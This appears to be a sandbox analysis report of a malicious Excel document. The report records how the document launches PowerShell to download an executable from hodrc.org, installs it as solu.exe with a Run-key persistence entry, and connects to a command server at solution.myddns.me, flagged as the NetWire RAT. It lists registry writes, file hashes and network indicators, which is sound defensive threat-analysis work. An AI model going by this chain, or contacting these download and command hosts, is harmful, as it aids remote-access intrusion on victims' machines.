HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
MessageId
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
Provider
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
ShouldShowBadging
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
MaxWait
2000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
SetUserAction
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
AppIdOnAction
4294967295
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 1
[F00000000][T01D661FCC7AB3F30][O00000000]*C:\Users\admin\Desktop\LetterofIntent-Eckharthelicopter.xls
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds0
5804129,17846737,18409363,17696988,8758344,17339781,17634580,7668685,18658649,18375312,18948102,7214608,18428691,9319450,17126295,18658648,17322183,18384724,5850062,18658650,18674530,18637650,16920930,20789191,17311449,17698821,18409416,7668686,22131214,18948101,7398615,19978122,20026645,17182941,7668692,18711811,22131171,7440607,19153728,17182981,17182942,4859234,18384801,25514583,17322188,17331930,19543138,5601374,17146274,7668683,5898847,8263521,5850584,17622912,8254547,22070208,23729926,18633496,17182980,8988293,18474530,8697678,17922253,4317338,7649375,17372928,21030619,16859363,6636695,17322181,9176926,17956946,5850122,24466059,8448079,6366290,5850463,6690465,17064074,7649377,5850305,5850582,17425358,19223073,8709129,8750272,18917267,5898845,17182979,6166345,17846738,17885409,17182943,23729931,7459348,17322184,6636694,5850583,22131201,17846749,7218753,8430030,5810308,17182982,18970382,22595280,5850061,5898851,17331926,17331923,7668682,7668681,17846753,17698820,7668693,17331927,17846750,17331929,17127502,6137435,6170083,23459486,17127501,17698822,8988294,17846730,17106064,17698823,17846747,17846734,7398614,18948169,22853700,17110992,17846735,17846748,17846736,19261452,19261450,19261453,19261451,6341763,7116053,6366291,18716634,17610659,18716635,17372899,17914001,17102418,18917269,6029780,8750242,17913997,17913998,17913999,17914000,4289286,7463684,17914002,17914003,22872910,5898849,24466061,17962391,5898880,8433728,5898881,5898884,22929427,8701660,18917328,18917326,18949600,18917268,17578125,18917271,22131169,18917330,18949601,25514584,18970383,22595279,22131208,17322179,18208672,22131207,17127511,22131213,8750241,22853699,5850525,22929425,5587867,23414153,4564173,17127509,16815750,18208656,7690258,8263520,22083550,7690253,22872911,7463105,18647262,19978123,25514585,17962392,5601367,25514582,7966755,6647824,17573643,7868952,17445651,17106059,17445650,17106060,17106065,17106063,19744898,17962113,18625879,36467677,19531353,5601379,7202269,23978014,7168707,6059089,
5601366,17110988,8709120,18441314,8747207,17311443,18208657,19174148,22349186,9037324,18633497,17311450,8996805,4859233,17969938,18208715,18208705,18208658,17311446,8709078,8709086,8709089,18621250,8709081,20248016,16860185,8750274,7214607,16843347,17339214,20489431,17618826,18384725,7690256,19744899,19732354,5888003,36467808,19732353,7690254,19543137,18375313,18384802,18647260,18647259,18647261,20026646,7657413,7649378,7657414,17842627,8447777,16815754,18970381,19198081,17045407,17045408,8430031,8254544,6301592,17425365,24131419,17322180,17322182,17322187,22929429,8758345,36292435
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3
Last
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{B866D7AE-7C99-4C20-AA98-278FC044FB98}
Categories
57020000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
4
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3\0
StartDate
A0C23EEBFC61D601
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3\0
Properties
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache
LastClean
905F48EBFC61D601
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe
RulesEndpoint
https://nexusrules.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.12026.20264&ClientId={D61AB268-C26A-439D-BB15-2A0DEDFCA6A3}&OSEnvironment=10&MsoAppId=1&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12026.20264&
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
Categories
0602000007020000170200000B020000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSCategoriesSeverities
827 15,1001 15,2159 10,1000 15,1338 10,1338 50,999 15,226 15,1282 50,1249 10,998 15,1039 15,831 15,1282 10,1249 15,1338 15,1282 15,829 15,1128 15,291 15,850 15,1622 50,828 15,1255 15,830 15,974 15,2159 6,670 15,671 15,1002 15,669 15,70 50,2086 15,2087 15,2088 15,1584 50
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds1
19437717,21030738,36274761,21034758,36495773,37889366,17134337,37627806,38355400,595964482,25227928,24404955,23738456,24933761,25227929,23738460,24498243,40921166,592446983,19200034,19200075,19200064,19200076,19200077,19200081,25036313,20312798,19200085,36274758,36274766,36274759,36274767,25228040,36274756,40920586,50890261,19805647,19805655,19805645,23979213,20833951,40920534,23979204,595955846,23979210,595940420,40920576,40921180,36283598,40920410,36283600,50890311,50890144,20039441,50890201,40921312,19952736,36487503,36487509,36487501,36487512,19200142,19252293,19200146,19685471,24404956,24470607,25036314,38040268,38040275,595964481,595952657,595964449,38040273,38040272,595955844,595955845,595955847,595953629,595956366,595956367,595956370,595956364,595939597
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3\0
EndDate
A082A815C662D601
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
excel.exe
Fri, 24 Jul 2020 20:56:36 GMT
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\RulesLastAudienceReported
excel.exe
Production
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSCategoriesSeverities
827 15,1001 15,1000 15,999 15,226 15,1282 50,1338 50,1338 10,1249 10,1039 15,998 15,1282 10,831 15,1249 15,1338 15,1282 15,829 15,1128 15,291 15,1622 50,850 15,828 15,830 15,1255 15,974 15,670 15,671 15,1002 15,669 15,70 50,2086 15,2087 15,2088 15
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents
LastPurgeTime
26593736
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common
SessionId
967B24270C88214EB672906428A39DFF
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{B866D7AE-7C99-4C20-AA98-278FC044FB98}
4
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3\0
FilePath
officeclient.microsoft.com\C0E5D08C-4B40-44F8-AC52-044B8C0E498A
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
excel.exe_queried
054B1B5F00000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3\0
Url
https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Property
0018C001283874D9
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}
ApplicationFlags
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}
DeviceTicket
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}
DeviceId
0018C001283874D9
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Volatile
MsaDevice
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSCategoriesSeverities
4580
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
418A073AA3BC3475
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General
LastAutoSavePurgeTime
26593741
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\26337AA2
26337AA2
04000000E4110000090000004100500050002D0045005800430045004C00000000000000000002600000000000000000000000000000A27A3326A27A33260000000000000000000000000000000000000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\26337AA2
26337AA2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\26337AA2
26337AA2
1948
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\196\52C64B7E
LanguageList
en-US
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
1948
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
1948
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1948
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
1948
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2752
solute.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2752
solute.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2752
solute.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2752
solute.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1740
solu.exe
delete key
HKEY_CURRENT_USER\Software\NetWire
1740
solu.exe
write
HKEY_CURRENT_USER\Software\NetWire
HostId
solu
1740
solu.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
solu
C:\Users\admin\AppData\Roaming\solu\solu.exe
1740
solu.exe
write
HKEY_CURRENT_USER\Software\NetWire
Install Date
2020-07-24 20:55:51

Files activity

Executable files
2
Suspicious files
1
Text files
5
Unknown types
1

Dropped files

PID
Process
Filename
Type
2752
solute.exe
C:\Users\admin\AppData\Roaming\solu\solu.exe
executable
MD5: 91506bc2a51501164b6a2b0c18ad1c44
SHA256: b16b3d99441f078e081e2ac0a8f0121ce4dab264bf434e353d1e00a57e54d3aa
1948
powershell.exe
C:\Users\admin\AppData\Local\Temp\solute.exe
executable
MD5: 91506bc2a51501164b6a2b0c18ad1c44
SHA256: b16b3d99441f078e081e2ac0a8f0121ce4dab264bf434e353d1e00a57e54d3aa
4580
EXCEL.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
xml
MD5: ad7c7878a2a9562233909b60dda482dd
SHA256: a76f0b3cb711829ec6b1fa57c74805610e30fdfd0a958ddf2389e4a5022ae939
4580
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
––
MD5:  ––
SHA256:  ––
4580
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z0B3631KDJ1WL4OLCXIM.temp
––
MD5:  ––
SHA256:  ––
4580
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 9516c3bd39de4530bfc285db07b9fe9d
SHA256: 0028b93747e2a48f7df30a7a6a8a533169de60aec37c92255c239f5eff356a4a
1948
powershell.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
binary
MD5: 65bdd5145d97fa744eef1cb6762b6f6d
SHA256: d2025033ac5b23ed2bc7b8518ce20528781835c6c4c485a0aa1bed3b388acf4a
1948
powershell.exe
C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x5qbth5m.rfy.psm1
––
MD5:  ––
SHA256:  ––
4580
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\.ses
text
MD5: c33ed3b632a8c623ea345a9b78d2524f
SHA256: 7256054b34b9dd3414ca30a35507f58cc4470e9885ba2f4ab3c33c21b547eea8
4580
EXCEL.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\C0E5D08C-4B40-44F8-AC52-044B8C0E498A
xml
MD5: a8f520b6746f3fa641a8b8342e819bcd
SHA256: 94d969f5fd76cc4e8fd4ed42864fc6b7ad9b9fcbb7fc9f39e21970648a8d4b6b
4580
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\LetterofIntent-Eckharthelicopter.xls.LNK
lnk
MD5: 0f58d7ee239e09ebc5980639c0d7eaa2
SHA256: 0739146fbe5404f541b3272a1f224cbb034da96de5f527e8da997e0de508c4d5
4580
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7OJ3GWE2MNKXM9VH8HAV.temp
––
MD5:  ––
SHA256:  ––
1948
powershell.exe
C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j5m1lfzy.0oo.ps1
––
MD5:  ––
SHA256:  ––

Find more information on the static content and download it at the full report

Network activity

HTTP(S) requests
15
TCP/UDP connections
15
DNS requests
9
Threats
7

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
4580 EXCEL.EXE GET 200 13.107.42.23:443 https://config.edge.skype.com/config/v2/Office/excel/16.0.12026.20264/Production/CC?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.12026.20264&MsoVersion=16.0.12026.20194&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&Channel=CC&InstallType=C2R&SessionId=%7b61BF321D-C30A-4492-9F75-7F82F56F1BC1%7d&LabMachine=false US text shared
1948 powershell.exe GET 200 45.40.135.135:80 http://hodrc.org/ot/solut.exe US executable suspicious
4580 EXCEL.EXE POST 200 52.114.128.70:443 https://self.events.data.microsoft.com/OneCollector/1.0/ US binary text whitelisted
4580 EXCEL.EXE POST 200 52.114.128.70:443 https://self.events.data.microsoft.com/OneCollector/1.0/ US binary text whitelisted
4580 EXCEL.EXE GET 200 52.109.76.6:443 https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3 IE xml whitelisted
4580 EXCEL.EXE GET 200 52.109.8.19:443 https://nexusrules.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.12026.20264&ClientId=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&OSEnvironment=10&MsoAppId=1&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12026.20264& US xml whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/RST2.srf US xml xml whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/ppsecure/deviceaddcredential.srf US text text whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/RST2.srf US xml xml whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/RST2.srf US xml xml whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/RST2.srf US xml xml whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/RST2.srf US xml xml whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/RST2.srf US xml xml whitelisted
4580 EXCEL.EXE POST 200 52.114.128.70:443 https://self.events.data.microsoft.com/OneCollector/1.0/ US binary text whitelisted
4580 EXCEL.EXE GET 304 20.191.48.196:443 https://settings-win-ppe.data.microsoft.com/settings/v2.0/Storage/StorageHealthEvaluation?os=Windows&deviceClass=Windows.Desktop&appVer=1.0.0.0 US –– –– whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
4580 EXCEL.EXE 13.107.42.23:443 Microsoft Corporation US suspicious
1948 powershell.exe 45.40.135.135:80 GoDaddy.com, LLC US suspicious
1740 solu.exe 185.165.153.158:2022 NL malicious
4580 EXCEL.EXE 52.109.76.6:443 Microsoft Corporation IE whitelisted
4580 EXCEL.EXE 52.109.8.19:443 Microsoft Corporation US whitelisted
–– –– 40.90.137.124:443 Microsoft Corporation US unknown
4580 EXCEL.EXE 52.114.128.70:443 Microsoft Corporation US unknown
–– –– 20.191.48.196:443 Microsoft Corporation US unknown

DNS requests

Domain IP Reputation
config.edge.skype.com 13.107.42.23 shared
hodrc.org 45.40.135.135 unknown
solution.myddns.me 185.165.153.158 malicious
officeclient.microsoft.com 52.109.76.6 whitelisted
nexusrules.officeapps.live.com 52.109.8.19 whitelisted
login.live.com 40.90.137.124, 40.90.137.125, 40.90.23.247, 40.90.23.153, 40.90.137.126, 40.90.23.206, 40.90.137.120, 40.90.137.127 whitelisted
self.events.data.microsoft.com 52.114.6.47, 52.114.128.70 whitelisted
settings-win-ppe.data.microsoft.com 20.191.48.196 whitelisted

Threats

PID Process Class Message
1948 powershell.exe Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
1948 powershell.exe Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1740 solu.exe A Network Trojan was detected MALWARE [PTsecurity] Netwire.RAT
1740 solu.exe A Network Trojan was detected MALWARE [PTsecurity] Netwire.RAT
1740 solu.exe A Network Trojan was detected MALWARE [PTsecurity] Netwire.RAT

2 ETPRO signatures available at the full report

Debug output strings

Process Message
–– InitSideBySide failed create an activation context. Error: 1814
–– Invalid parameter passed to C runtime function.
–– Invalid parameter passed to C runtime function.